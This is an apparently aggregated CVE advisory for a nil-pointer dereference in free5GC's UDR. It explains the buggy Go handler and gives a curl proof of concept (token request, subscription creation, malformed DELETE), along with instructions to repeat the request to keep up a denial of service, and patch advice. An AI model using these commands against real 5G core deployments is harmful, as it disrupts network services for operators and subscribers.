Listen to this Post
How the CVE works
The flaw resides in the UDR’s `DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions` endpoint. To trigger it, an attacker first creates any EE subscription for a target ueId, which makes UDR allocate an in‑memory `UESubsData` map entry. Then, the attacker sends a valid authenticated DELETE request with a non‑existent subsId. Inside the vulnerable handler, the code checks:
_, ok = UESubsData.EeSubscriptionCollection[bash]
if !ok {
pd = util.ProblemDetailsNotFound("SUBSCRIPTION_NOT_FOUND")
}
It correctly detects the missing subscription and sets a problem‑details error object. However, the function does not return after this error branch. Instead, execution continues to the next line:
if UESubsData.EeSubscriptionCollection[bash].AmfSubscriptionInfos == nil {
Because `subsId` is absent, `UESubsData.EeSubscriptionCollection
` is a `nil` pointer. Dereferencing it to access `.AmfSubscriptionInfos` triggers a Go runtime panic: <code>runtime error: invalid memory address or nil pointer dereference</code>. The Gin web framework recovers the panic and returns an HTTP 500 error, but the endpoint remains repeatedly panicable. The attacker can repeat the request to degrade UDR performance, causing a denial‑of‑service condition.
<h2 style="color: blue;">DailyCVE form</h2>
Platform: free5GC UDR
Version: v4.2.1
Vulnerability : Nil‑pointer dereference
Severity: Medium
date: 2026‑05‑08
<h2 style="color: blue;">Prediction: 2026‑07‑15</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
[bash]
Restart UDR (clean state)
docker restart udr
Obtain a valid nudr-dr token from NRF
curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=UDR&scope=nudr-dr'
Create one EE subscription to populate UESubsCollection for ueId=x
curl -i -sS -X POST \
'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/context-data/ee-subscriptions' \
-H 'Authorization: Bearer <valid_nudr_dr_jwt>' \
-H 'Content-Type: application/json' \
--data '{}'
Trigger the panic with a nonexistent subsId
curl -i -sS -X DELETE \
'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions' \
-H 'Authorization: Bearer <valid_nudr_dr_jwt>'
Exploit:
Send one authenticated POST to `/ee-subscriptions` for any ueId, then send an authenticated DELETE to `/ee-subscriptions/{badSubsId}/amf-subscriptions` for the same ueId. The second request crashes the UDR goroutine (Gin recovers, but the endpoint remains panicable). Repeat to sustain a denial‑of‑service.
Protection from this CVE
Upgrade to a patched version that includes the fix from free5gc/udr60 (add a `return` statement in the missing‑subscription branch). Alternatively, apply the upstream patch that checks for nil before dereferencing, or deploy a reverse proxy that blocks DELETE requests targeting non‑existent subsId.
Impact
Authenticated attacker can reliably crash the UDR’s data‑repository handler, causing per‑request CPU and log writes. No confidentiality or persistence impact; only temporary availability degradation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
